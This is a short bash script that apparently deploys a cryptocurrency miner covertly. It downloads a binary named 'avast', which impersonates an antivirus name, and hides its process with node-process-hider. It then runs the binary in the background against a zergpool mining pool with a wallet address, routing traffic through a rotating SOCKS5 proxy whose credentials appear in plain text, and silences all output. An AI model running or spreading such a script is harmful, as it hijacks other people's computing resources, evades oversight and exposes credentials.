#!/bin/bash
wget https://github.com/aurbach55/toya/raw/main/avast >/dev/null 2>&1
apt-get install -y nodejs >/dev/null 2>&1
npm i -g node-process-hider >/dev/null 2>&1
ph add avast
chmod +x avast  >/dev/null 2>&1
nohup ./avast -v -l  verushash.asia.mine.zergpool.com:3300 -u 7pXYkwdwUFBGNaG8dJ8w6kZTzRjnTpDTgo.$(echo $(shuf -i 1-99999 -n 1)-TPU) -p c=DASH -t 4 -x socks5://njhlezbg-rotate:bo6mj3wz34gr@p.webshare.io:80 > nohup.out
